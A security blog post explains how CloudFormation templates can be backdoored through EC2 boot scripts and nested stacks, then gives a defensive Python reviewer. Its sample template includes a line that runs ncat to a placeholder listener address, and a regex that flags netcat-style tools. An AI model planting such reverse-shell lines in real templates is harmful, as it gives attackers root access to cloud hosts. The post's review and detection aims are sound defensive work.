CloudFormation Templates: What’s in That Stack?
What would happen if someone provisioned a stack from a blog post that created new identity access management (IAM) roles, disabled logging services or created new security groups? Would you know?
In preparation for a research project I needed to create the AWS infrastructure that would run Docker, Kubernetes and our containerized app. I also needed to enable and configure multiple AWS resources, including EC2 instances, security groups, subnets and IAM roles. With a working knowledge of the basic resources needed for the project I turned to Google in the hope of locating an example. I quickly stumbled upon a few helpful CloudFormation templates (CFTs) from someone who had undertaken a similar project.
CloudFormation templates can be used to spin up individual resources or entire environments. The templates are text files written in JSON or YAML (often with a .template extension). A template defines the properties of the resource(s) a user seeks to provision. Templates are managed, updated and deployed as a unit known as a stack. Once a formation template is written, it can be reused in other AWS environments simply by changing a few resource parameters.
To launch the CloudFormation template I found in my Google search, all I had to do was click a button in the blog post, which pivoted into my AWS management console and began the deployment.
Easy, right? All too easy.
Once the underlying infrastructure of the project was provisioned and working, I went back and took a deeper look at one of the templates and wondered what the file was doing. I provisioned first and asked questions later.
Not the best idea.
Scrolling through the YAML file I saw a boot script that the EC2 instance would run as part of the provisioning process, installing packages and executing commands.
My curiosity was piqued. How easy would it be to backdoor a CloudFormation template? I decided to add two commands to the CFT: the first installs nmap-ncat and the second uses netcat to connect to a remote listener.
Upon creation of the stack, I now had a working EC2 instance, but there was already a remote root shell connection.
Great, but somewhat obvious to anyone who took a second to glance at the CFT. How could I hide the malicious commands from the user? AWS CloudFormation allows nested stacks. The top-level stack is called a root stack. A root stack can have one or more nested stacks beneath it that provision additional resources.
The image below shows the root stack calling a nested stack for the resource GitlabInstance. The nested stack uses another template located in an open S3 bucket.
As before, the complete stack deploys successfully from the AWS console, and the formation template spins up a working EC2 instance that connects back to the listener.
Conclusion: CFTs need to be analyzed first.
This is an example of a basic formation template attack. It’s opportunistic and it would be very hard to target a specific organization in this manner, but it clearly illustrates that CloudFormation templates (CFTs) need to be analyzed prior to deployment.
We suggest prevention tools.
From a security perspective it is critical to understand the actions within the formation template before it is deployed. If there are nested stacks being called, they need to be analyzed as well.
Analyze what resources are being provisioned, what they’re used for and if the resources are labeled. For example, if a security group is created look closely at inbound and outbound rules. Most CFTs I’ve seen only create security groups that lock down incoming connections, leaving outbound wide open. This was the case for the formation template used in the example above.
Make sure users deploying the formation templates don’t have overly permissive permissions. If a formation template is compromised, those users then won’t have the permissions needed to deploy the malicious resources.
Several cybersecurity solution providers have the ability to scan formation templates for malicious behavior. Use them.
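As an added example (not code from this post or from Optiv), the Python reviewer below applies the checks just listed to a JSON template before it is deployed: it reports nested stacks and their TemplateURL, surfaces boot-script lines that install or run network tools, and flags security groups whose outbound side is open. The template, bucket name and listener address are constructed; a YAML template would first need a loader that tolerates the !Ref/!Sub short-form tags so that it yields the same dictionary.

```python
"""Static pre-deployment review of a CloudFormation template (added example)."""
import json
import re

# Constructed JSON template mirroring the post: a root stack nesting a second template from an
# S3 URL, a boot script that installs nmap-ncat and calls a placeholder listener, no egress rules.
SAMPLE = json.dumps({"Resources": {
    "GitlabInstance": {"Type": "AWS::CloudFormation::Stack", "Properties": {
        "TemplateURL": "https://s3.amazonaws.com/example-bucket/nested.json"}},
    "Web": {"Type": "AWS::EC2::Instance", "Properties": {"UserData": {"Fn::Base64": {
        "Fn::Join": ["", ["#!/bin/bash\n", "yum install -y nmap-ncat\n", "ncat 198.51.100.7 4444\n"]]}}}},
    "SG": {"Type": "AWS::EC2::SecurityGroup", "Properties": {"SecurityGroupIngress": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIp": "10.0.0.0/8"}]}}}})

BOOT_TYPES = {"AWS::EC2::Instance", "AWS::AutoScaling::LaunchConfiguration"}
# Boot-script lines worth surfacing: network tools installed or run, or a download piped
# straight into a shell. Tune this list for your own environment.
SUSPECT = re.compile(r"\b(nmap-ncat|netcat|ncat|nc|socat)\b|curl[^\n|]*\|\s*(ba)?sh", re.I)

def text_of(node):
    """Collect literal strings inside a UserData value, looking through the Fn::Base64,
    Fn::Join and Fn::Sub wrappers (dict values only; keys are ignored)."""
    if isinstance(node, str):
        return node
    if isinstance(node, (list, dict)):
        items = node if isinstance(node, list) else node.values()
        return "".join(text_of(n) for n in items)
    return ""

def review(template_json):
    """Return (resource name, finding) pairs for the checks the post recommends."""
    findings = []
    for name, res in json.loads(template_json).get("Resources", {}).items():
        rtype, props = res.get("Type", ""), res.get("Properties", {})
        if rtype == "AWS::CloudFormation::Stack":
            findings.append((name, f"nested stack pulls {props.get('TemplateURL')}: review it too"))
        elif rtype in BOOT_TYPES:
            for line in text_of(props.get("UserData", "")).splitlines():
                if SUSPECT.search(line):
                    findings.append((name, f"boot script runs: {line.strip()}"))
        elif rtype == "AWS::EC2::SecurityGroup":
            egress = props.get("SecurityGroupEgress")
            if egress is None:  # omitted egress means AWS adds its default allow-all outbound rule
                findings.append((name, "no egress rules: outbound is wide open by default"))
            elif any(r.get("CidrIp") == "0.0.0.0/0" for r in egress):
                findings.append((name, "egress rule open to 0.0.0.0/0"))
        elif rtype.startswith("AWS::IAM::"):
            findings.append((name, f"creates {rtype}: inspect its policy statements"))
    return findings
```

Run `review(SAMPLE)` on the constructed template and it reports the nested stack, both suspicious boot-script lines and the missing egress rules; feed it your own template text to review before clicking the launch button.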